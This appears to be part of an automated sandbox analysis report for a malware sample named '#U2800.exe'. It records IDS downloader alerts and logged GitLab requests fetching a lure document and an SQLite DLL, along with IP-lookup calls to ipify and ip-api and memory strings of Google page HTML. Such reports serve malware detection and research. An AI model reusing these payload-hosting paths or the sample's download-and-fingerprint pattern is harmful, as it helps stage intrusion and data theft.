      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 142.250.185.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 142.250.185.228:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 104.26.13.205:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 104.26.13.205:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49780 -> 104.26.13.205:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49779 -> 104.26.13.205:443
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: #U2800.exe, 00000000.00000003.1692653842.00000274BB852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: </li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='AVR--65TqnF6nA1nm3AykQ'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbad equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: </li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='AVR--65TqnF6nA1nm3AykQ'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbadx equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.00000234279C7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span< equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: an class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='QpPr3aRoD-oiQgy6viCOuQ'>document.getElementById('gbztm').addEventListener('click' equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: d=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='MI4 equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.000002342791A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: lass=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='j0ADRrRGfWWpVX6-MsNhfA'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a clasR: equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.00000234279C7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: r.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><N<'R equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='JhysMQNK6_ydbAJSCZWg7A'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/ equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='QpPr3aRoD-oiQgy6viCOuQ'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gb equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='j0ADRrRGfWWpVX6-MsNhfA'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='j0ADRrRGfWWpVX6-MsNhfA'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.com/?hl=en&tab=wT">Translate</a></li><li class=gbmtc><a class=gbmt id=gb_17 href="http://www.google.com/mobile/?hl=en&tab=wD">Mobile</a></li><li class=gbmtc><a class=gbmt id=gb_10 href="https://books.google.com/?hl=en&tab=wp">Books</a></li><li class=gbmtc><a class=gbmt id=gb_6 href="https://www.google.com/shopping?hl=en&source=og&tab=wf">Shopping</a></li><li class=gbmtc><a class=gbmt id=gb_30 href="https://www.blogger.com/?tab=wj">Blogger</a></li><li class=gbmtc><a class=gbmt id=gb_27 href="https://www.google.com/finance?tab=we">Finance</a></li><li class=gbmtc><a class=gbmt id=gb_31 href="https://photos.google.com/?tab=wq&pageId=none">Photos</a></li><li class=gbmtc><a class=gbmt id=gb_25 href="https://docs.google.com/document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.com/intl/en/about/products?tab=wh" class=gbmt>Even more &raquo;</a><script nonce='j0ADRrR
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427AB5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='j0ADRrRGfWWpVX6-MsNhfA'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><span class=gbts>Drive</span></a></li><li class=gbt><a class=gbgt id=gbztm href="https://www.google.com/intl/en/about/products?tab=wh" aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='j0ADRrRGfWWpVX6-MsNhfA'>document.getElementById('gbztm').addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd aria-owner=gbztm><div id=gbmmb class="gbmc gbsb gbsbis"><ol id=gbmm class="gbmcc gbsbic"><li class=gbmtc><a class=gbmt id=gb_24 href="https://calendar.google.com/calendar?tab=wc">Calendar</a></li><li class=gbmtc><a class=gbmt id=gb_51 href="https://translate.google.com/?hl=en&tab=wT">Translate</a></li><li class=gbmtc><a class=gbmt id=gb_17 href="http://www.google.com/mobile/?hl=en&tab=wD">Mobile</a></li><li class=gbmtc><a class=gbmt id=gb_10 href="https://books.google.com/?hl=en&tab=wp">Books</a></li><li class=gbmtc><a class=gbmt id=gb_6 href="https://www.google.com/shopping?hl=en&source=og&tab=wf">Shopping</a></li><li class=gbmtc><a class=gbmt id=gb_30 href="https://www.blogger.com/?tab=wj">Blogger</a></li><li class=gbmtc><a class=gbmt id=gb_27 href="https://www.google.com/finance?tab=we">Finance</a></li><li class=gbmtc><a class=gbmt id=gb_31 href="https://photos.google.com/?tab=wq&pageId=none">Photos</a></li><li class=gbmtc><a class=gbmt id=gb_25 href="https://docs.google.com/document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.com/intl/en/about/products?tab=wh" class=gbmt>Even more &raquo;</a><script nonce='j0ADRrR
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427992000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='n_ayC3usWyR8ylFlcYBgCA'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/eF equals www.youtube.com (Youtube)
      Source: #U2800.exe, 00000000.00000002.1977175799.0000023427939000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: })();</script><div id="mngb"><div id=gb><script nonce='y6efxfUWkhaItnwYF5sHMQ'>window.gbar&&gbar.eli&&gbar.eli()</script><div id=gbw><div id=gbz><span class=gbtcb></span><ol id=gbzc class=gbtc><li class=gbt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.com/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.com/imghp?hl=en&tab=wi"><span class=gbtb2></span><span class=gbts>Images</span></a></li><li class=gbt><a class=gbzt id=gb_8 href="https://maps.google.com/maps?hl=en&tab=wl"><span class=gbtb2></span><span class=gbts>Maps</span></a></li><li class=gbt><a class=gbzt id=gb_78 href="https://play.google.com/?hl=en&tab=w8"><span class=gbtb2></span><span class=gbts>Play</span></a></li><li class=gbt><a class=gbzt id=gb_36 href="https://www.youtube.com/?tab=w1"><span class=gbtb2></span><span class=gbts>YouTube</span></a></li><li class=gbt><a class=gbzt id=gb_426 href="https://news.google.com/?tab=wn"><span class=gbtb2></span><span class=gbts>News</span></a></li><li class=gbt><a class=gbzt id=gb_23 href="https://mail.google.com/mail/?tab=wm"><span class=gbtb2></span><span class=gbts>Gmail</span></a></li><li class=gbt><a class=gbzt id=gb_49 href="https://drive.google.com/?tab=wo"><span class=gbtb2></span><\* equals www.youtube.com (Youtube)
      Source: global trafficDNS traffic detected: DNS query: google.com
      Source: global trafficDNS traffic detected: DNS query: gitlab.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
      Source: global trafficDNS traffic detected: DNS query: ip-api.com
      Source: #U2800.exe, 00000000.00000002.1979563473.0000023429C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:443/
      Source: #U2800.exe, 00000000.00000000.1665994556.00007FF73408B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000002.1983105073.00007FF73368B000.00000002.00000001.01000000.00000003.sdmp, #U2800.exe, 00000000.00000000.1665994556.00007FF73368B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
